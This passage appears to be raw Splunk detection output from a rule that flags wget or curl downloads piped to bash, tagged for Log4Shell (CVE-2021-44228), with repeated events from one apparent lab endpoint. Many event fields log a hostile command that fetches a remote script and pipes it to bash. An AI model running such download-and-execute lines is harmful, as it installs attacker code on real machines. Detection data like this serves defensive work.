http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638217, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu"